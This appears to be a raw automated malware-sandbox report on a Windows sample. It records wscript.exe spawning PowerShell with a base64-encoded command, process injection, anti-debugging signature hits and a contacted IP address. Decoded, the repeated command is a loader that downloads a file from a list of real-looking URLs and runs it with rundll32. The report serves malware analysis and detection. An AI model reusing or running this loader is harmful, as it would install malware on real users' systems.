cmdline powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAGQAbwBjAGkAcwBuAGUAaQByAG8AcwAuAGMAbwBtAC4AYgByAC8ARwBPAG0ALwBJAGkANgBYADAATQB6AEcAcwA4AHoALABoAHQAdABwAHMAOgAvAC8AaQBtAG0AdQBuAG8AbABpAGQAZQByAGEAegBnAG8AeQBvAHAAbwByAHQAdQBuAGkAZABhAGQALgBjAG8AbQAvAHgAcQBhADYAQwBuAHkALwAxAFAAZgB5AGgAdQBuAEYALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AdQBuAGkAZABhAGQAZQBoAGUAYgByAG8AbQAuAGMAbwBtAC4AYgByAC8AMABQADEANgAvAHQAcQB1ADcAdQBzAEcANwBCACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBTAG4AbgBnADUASABuAFQAQQBmADEALABoAHQAdABwAHMAOgAvAC8AdABoAGUAeQBvAHUAbgBnAGEAbgBkAHQAaABlAHIAYQB0AGMAaABlAHQALgBjAG8AbQAvAEkAegB2AE8ALwBPAHMAawBNADAALABoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBoAHMARQBWADIALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAGUARwB3AGYATwB6AEgALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAHEANwAwAGoAWAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABkAGUAcABvAHIAdAAgAGkAbgAgACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGQAZQBwAG8AcgB0ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAGwAbQBpAHMAdABzAC4AcABhAGQAZABsAGUAYgBvAGEAcgBkAFUAbgBsAGkAdgBlAGwAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAGQAbwBjAGkAcwBuAGUAaQByAG8AcwAuAGMAbwBtAC4AYgByAC8ARwBPAG0ALwBJAGkANgBYADAATQB6AEcAcwA4AHoALABoAHQAdABwAHMAOgAvAC8AaQBtAG0AdQBuAG8AbABpAGQAZQByAGEAegBnAG8AeQBvAHAAbwByAHQAdQBuAGkAZABhAGQALgBjAG8AbQAvAHgAcQBhADYAQwBuAHkALwAxAFAAZgB5AGgAdQBuAEYALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AdQBuAGkAZABhAGQAZQBoAGUAYgByAG8AbQAuAGMAbwBtAC4AYgByAC8AMABQADEANgAvAHQAcQB1ADcAdQBzAEcANwBCACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBTAG4AbgBnADUASABuAFQAQQBmADEALABoAHQAdABwAHMAOgAvAC8AdABoAGUAeQBvAHUAbgBnAGEAbgBkAHQAaABlAHIAYQB0AGMAaABlAHQALgBjAG8AbQAvAEkAegB2AE8ALwBPAHMAawBNADAALABoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBoAHMARQBWADIALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAGUARwB3AGYATwB6AEgALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAHEANwAwAGoAWAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABkAGUAcABvAHIAdAAgAGkAbgAgACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGQAZQBwAG8AcgB0ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAGwAbQBpAHMAdABzAC4AcABhAGQAZABsAGUAYgBvAGEAcgBkAFUAbgBsAGkAdgBlAGwAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 185.252.178.121
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAGQAbwBjAGkAcwBuAGUAaQByAG8AcwAuAGMAbwBtAC4AYgByAC8ARwBPAG0ALwBJAGkANgBYADAATQB6AEcAcwA4AHoALABoAHQAdABwAHMAOgAvAC8AaQBtAG0AdQBuAG8AbABpAGQAZQByAGEAegBnAG8AeQBvAHAAbwByAHQAdQBuAGkAZABhAGQALgBjAG8AbQAvAHgAcQBhADYAQwBuAHkALwAxAFAAZgB5AGgAdQBuAEYALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AdQBuAGkAZABhAGQAZQBoAGUAYgByAG8AbQAuAGMAbwBtAC4AYgByAC8AMABQADEANgAvAHQAcQB1ADcAdQBzAEcANwBCACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBTAG4AbgBnADUASABuAFQAQQBmADEALABoAHQAdABwAHMAOgAvAC8AdABoAGUAeQBvAHUAbgBnAGEAbgBkAHQAaABlAHIAYQB0AGMAaABlAHQALgBjAG8AbQAvAEkAegB2AE8ALwBPAHMAawBNADAALABoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBoAHMARQBWADIALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAGUARwB3AGYATwB6AEgALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAHEANwAwAGoAWAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABkAGUAcABvAHIAdAAgAGkAbgAgACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGQAZQBwAG8AcgB0ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAGwAbQBpAHMAdABzAC4AcABhAGQAZABsAGUAYgBvAGEAcgBkAFUAbgBsAGkAdgBlAGwAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
parent_process wscript.exe martian_process powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAGQAbwBjAGkAcwBuAGUAaQByAG8AcwAuAGMAbwBtAC4AYgByAC8ARwBPAG0ALwBJAGkANgBYADAATQB6AEcAcwA4AHoALABoAHQAdABwAHMAOgAvAC8AaQBtAG0AdQBuAG8AbABpAGQAZQByAGEAegBnAG8AeQBvAHAAbwByAHQAdQBuAGkAZABhAGQALgBjAG8AbQAvAHgAcQBhADYAQwBuAHkALwAxAFAAZgB5AGgAdQBuAEYALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AdQBuAGkAZABhAGQAZQBoAGUAYgByAG8AbQAuAGMAbwBtAC4AYgByAC8AMABQADEANgAvAHQAcQB1ADcAdQBzAEcANwBCACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBTAG4AbgBnADUASABuAFQAQQBmADEALABoAHQAdABwAHMAOgAvAC8AdABoAGUAeQBvAHUAbgBnAGEAbgBkAHQAaABlAHIAYQB0AGMAaABlAHQALgBjAG8AbQAvAEkAegB2AE8ALwBPAHMAawBNADAALABoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBoAHMARQBWADIALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAGUARwB3AGYATwB6AEgALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAHEANwAwAGoAWAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABkAGUAcABvAHIAdAAgAGkAbgAgACQAZABlAHUAdABvAG4AeQBtAHAAaABhAGwARQByAHIAYQBuAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGQAZQBwAG8AcgB0ACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAGwAbQBpAHMAdABzAC4AcABhAGQAZABsAGUAYgBvAGEAcgBkAFUAbgBsAGkAdgBlAGwAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABwAGEAbABtAGkAcwB0AHMALgBwAGEAZABkAGwAZQBiAG8AYQByAGQAVQBuAGwAaQB2AGUAbAB5ACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
Process injection Process 2548 resumed a thread in remote process 2684
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2684
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe